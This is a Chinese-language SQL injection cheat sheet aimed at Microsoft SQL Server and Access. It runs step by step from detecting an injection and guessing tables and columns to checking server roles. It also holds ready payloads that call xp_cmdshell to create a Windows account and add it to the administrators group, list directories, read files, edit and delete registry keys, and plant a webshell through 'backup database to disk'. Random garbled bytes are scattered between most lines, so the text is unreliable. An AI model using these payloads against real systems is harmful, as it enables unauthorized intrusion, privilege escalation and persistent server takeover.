1.判断是否有注入;and 1=1 ;and 1=2 UlN�}SddI9
2.初步判断是否是mssql ;and user>0 3S^Qo9���S
2�5,� [<Ao
3.注入参数是字符'and [查询条件] and ''=' m|cR�j{xZF
jvd3_L-@E<
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 0~<t �:q�!
��Va�s�Q/
5.判断数据库系统 cv_O�2Q4,@
cP��/(��h�
;and (select count(*) from sysobjects)>0 mssql ZMyd�+C_P2
c:z}$DK&'�
;and (select count(*) from msysobjects)>0 access Y�=pRen�V'
6*ZZ�)��W<
Tig�6<t�+Q
&���#q%#M:
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Z-U3Tr�SI
mn<�e��a�&
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 84H��m
PPt
nzYFa J�+
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 A�Q.q?'vE)
G��Eb)nHQq
9.(1)猜字段的ascii值(access) �lgAE�`Os�
M�T&q�~jx*
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �I#p-P)Q%S
�S
1J��i\
(2)猜字段的ascii值(mssql) }>j1j^c1='
oU 8o�;zk0
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Z3T�2�6U�k
R?%|RCht1�
10.测试权限结构(mssql) C$B?|oUJc
483v�FL�nF
e''Wm.>g(+
JeC��Ej=_Z
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �WHF:>��0B
U(�qM( E�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- r?2C%��GI`
�sAc)�X!}
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �0P��53dF
BQ&h&�57K�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ��gzd�gnF2
8|Y�^�z_C�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 8�i"{GGV�C
{�gi"kt�gk
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ��1��Ke�bl
�u�09OnP\�
;and 1=(select IS_MEMBER('db_owner'));-- k�p;M�NRc
e����S
Fmx
���[K�9q�+
CnA�*o 8w
11.添加mssql和系统的帐户 z�K�W�i9�
�X�JO�o.�Y
;exec master.dbo.sp_addlogin username;-- -)�<�Nd:�A
;exec master.dbo.sp_password null,username,password;-- ��!�8�s:3]
�khu,�P[3>
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- CGg6n��CB
D�{z=)�'/F
;exec master.dbo.xp_cmdshell 'net user username password q��C|re�!K
a�A
y�Fu�_
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- d ly 08�74
�&k{@�:��z
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ;[��zx'e?!
�h/w-� &7t
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- %r�,2ZLZ
�hQ�8�{
A7
��}&naP���
KJkc��mF}Q
12.(1)遍历目录 &��
='�uAw
K�|1^?#n�
;create table dirs(paths varchar(100), id int) p9sxA|O=y
�4-n��.4j|
;insert dirs exec master.dbo.xp_dirtree 'c:\' I5�"=b}�V5
u��})JQ<�|
;and (select top 1 paths from dirs)>0 0UB'6wR�Vo
NA�ocmbfNz
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) <(t<�g�S�#
�JT-Zo� OZ
Cw2�+@7?|
n*xNMw1x"T
(2)遍历目录 aY+>�85?g�
Z�j<T�#4?8
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Q\�z*q�,^R
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �x�O@OkCue
��U�X��9o�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �@<sP�1`�1
�~gD�tj�&F
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 )T+��h�tD)
WL~`L!_. A
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
�VE�Z/-s/
Te/)�[I'Tn
u�6�0��l�-
Mt:��(w;�Y
13.mssql中的存储过程 0n�uF�W�V�
A,/��S/_Q=
xp_regenumvalues 注册表根键, 子键 P$QfcJq&c*
3W�VHI$A9
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 $_UF9�l0��
Q&LkS�T-i�
xp_regread 根键,子键,键值名 E�k�BM>*�W
mn�ia>;
0H
;exec xp_regread J{ Vl2P�?@
�#75�;%a�8
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 \#}%E h
�b
)�,Rj@52l�
xp_regwrite 根键,子键, 值名, 值类型, 值 q.t5L=l^
r
k��gu+�q\?
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 HT�G;'�$H^
J5"*�O�H:f
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 L$�Q��+R�'
�Bk�F[nL*|
xp_regdeletevalue 根键,子键,值名 �ko�U.`l.
�;�D7jE+��
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 #]'xUg�cE9
^pP
14y*go
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �g�s�3}rW
zkOgL9
(_8
7�3.b9�m�F
\��4[Ta,;t
14.mssql的backup创建webshell tQ67X�Ab�
�U8�mu<��)
use model pf_ /jR��
S7vE[�VF5
create table cmd(str image); !Z��ZA�I_N
9��lx�T5Wg
insert into cmd(str) values (''); ��I�Y�&a!�
�/~[R�
�u�
backup database model to disk='c:\l.asp'; �;���<�A/e
P.�:T�
zk6
v=>Gvl3&�U
URgF8?�n��
15.mssql内置函数 G;;~xfE'�
96avg���yc
;and (select @@version)>0 获得Windows的版本号 �:6�+~"7T�
u"jnEK�N0y
;and user_name()='dbo' 判断当前系统的连接用户是不是sa qu%s �7�+�
�/�[�"T#`�
;and (select user_name())>0 爆当前系统的连接用户 nmGHJ��b,$
@gc"-�V*-/
;and (select db_name())>0 得到当前连接的数据库
_1'Pb/��1
%-Z~f~�<?�
?r<F\rBT7*
c�Ip h��$@
16.简洁的webshell Kc�0OLcu^d
}�TW=eu�~�
use model @\?f77Of6
�,GI�qRT4K
create table cmd(str image); |Y11�sDa9h
�]r6bJ���2
insert into cmd(str) values (''); Bl]�;^W�^P
m�tH�z6�+
backup database model to disk='g:\wwwtest\l.asp';
